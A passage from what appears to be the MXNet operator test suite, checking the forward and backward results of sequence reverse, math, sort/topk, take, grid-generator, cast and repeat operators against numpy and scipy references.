return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
    except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
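    # gt_topk builds the numpy ground truth: 'indices'/'value' take the k smallest
    # (is_ascend=True) or largest entries along `axis`; any other ret_typ is treated as
    # the mask case and marks those entries with ones.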
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@with_seed()
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
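# Why grad_est above is the right check: for the affine case each output point is
# A @ [x_norm, y_norm, 1]^T, with the normalized target coordinates stored in the
# rows of `tmp`; by the chain rule dL/dA = dL/d(output) @ tmp.T, which is exactly
# the matrix product computed for grad_est.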
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
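# Minimal illustration of the tie-breaking cases generated above, assuming the
# IEEE-754 round-to-nearest-even float32->float16 cast that the comment below
# requires. Hypothetical helper, not invoked by the tests:
def _fp16_round_to_even_examples():
    # 1 + 2^-11 lies exactly between the fp16 neighbours 1.0 and 1 + 2^-10;
    # the tie resolves to the even mantissa, i.e. 1.0.
    assert np.float64(1.0 + 2.0**-11).astype(np.float16) == np.float16(1.0)
    # 1 + 3*2^-11 ties between 1 + 2^-10 (odd) and 1 + 2^-9 (even) -> 1 + 2^-9.
    assert np.float64(1.0 + 3 * 2.0**-11).astype(np.float16) == np.float16(1.0 + 2.0**-9)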
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for in_val, model_fp32_val, np_fp32_val in zip(input_np, sym_output, expected_output):
assert (model_fp32_val == np_fp32_val) or \
(np.isnan(model_fp32_val) and np.isnan(np_fp32_val)), \
'fp16->fp32 multicast mismatch: with input value {}, model_fp32 = {}, numpy_fp32 = {}'.format(
in_val, model_fp32_val, np_fp32_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
